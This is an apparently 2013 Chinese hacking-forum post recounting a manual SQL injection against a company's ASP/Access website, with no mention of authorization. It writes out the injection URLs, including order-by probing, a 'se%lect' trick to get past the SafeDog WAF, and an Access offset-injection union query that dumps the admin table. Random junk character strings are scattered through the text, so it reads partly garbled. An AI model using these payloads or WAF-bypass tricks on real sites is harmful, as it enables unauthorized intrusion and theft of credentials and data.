中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]
作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
6 e9 R1 s( I) y  Y: S0 y6 H8 K/ k
2 i. q7 f+ s0 E9 f% c% D. a
+ {+ W/ [+ ]8 G  T3 g2 X# E, ]顺手加个admin, L) k1 }7 @# }4 \9 K" [

6 Z$ _  i9 r1 Z/ h* \' o5 ^
* h4 R$ }2 M8 _/ F7 [& k$ I默认后台。+ F2 {9 j" g8 x3 _8 J
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
6 ^! a: }3 k/ v+ J5 v# r4 h3 U3 X* V0 L9 E

: N9 ?1 S3 B; d+ g$ n5 w2 F( n8 u) O+ i7 ]
所以就不用御剑扫了,待会直接封IP。/ u' y$ F) |( T3 y! A1 Z

$ s( f- q& j% D* }. P用order by语句判断是否存在注入。
* P# I0 N, K& y' chttp://www.xxx.com /product_show.asp?id=997 order by 1
7 N$ m0 [0 _( I1 ahttp://www.xxx.com /product_show.asp?id=997 order by 100
: B2 }3 S. u' x1 A现在存在注入,经测试后发现是9个字段。- F$ X! r+ R" E+ Y
/ {2 m& U8 E4 ~- _' T; G7 |/ S
接下来进行联合查询,猜是否存在admin表。4 u& r9 d% A( v% w6 N
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​3 q0 b" [9 [( Q/ G7 U/ X5 J
5 N1 w& M( T* Y
2 E8 J- B) r$ _* z
* l2 b" t% ^( Z) {0 r: C: U0 ~
在select中间加个%,se%lect绕过安全狗。$ U6 t4 g$ J# p5 ~1 m# c4 j
, p& \6 T' S# m, {2 |/ X& T

. E7 @, a) K* G% ^" r发现存在admin表,然后开始手工猜常用的字段。
6 w5 B5 O% ?  P  R% G( A6 ^! X9 Q/ A纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。  P" j! F3 L5 y  D, P2 Z2 I

6 ]: T) b& J2 k+ Y9 V突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
$ N8 C: F, @3 r! D$ T! H4 z
- r7 z) e( ^& V% x: Q4 Z科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。' \& \% f3 `4 E* v7 C
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
/ k! `$ {6 O3 I0 h4 n, g好了,敏感内容出显了。​1 |- r0 E/ o8 O8 c
" k1 x' {" x4 O& P6 W
; a2 \  n* D( H( M7 P

8 X5 U  |5 |8 j6 {. u: T( E



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2